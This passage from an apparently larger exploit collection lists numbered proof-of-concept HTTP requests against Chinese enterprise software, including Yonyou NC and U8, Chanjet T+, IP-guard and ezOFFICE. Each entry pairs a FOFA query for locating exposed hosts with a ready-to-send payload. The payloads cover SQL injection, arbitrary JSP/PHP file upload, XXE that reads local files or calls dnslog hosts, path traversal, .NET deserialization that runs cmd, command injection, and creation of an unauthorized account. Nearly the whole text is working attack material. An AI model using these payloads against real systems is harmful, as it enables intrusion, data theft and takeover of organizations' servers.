User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target. It executes a command that writes the given string into the named file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
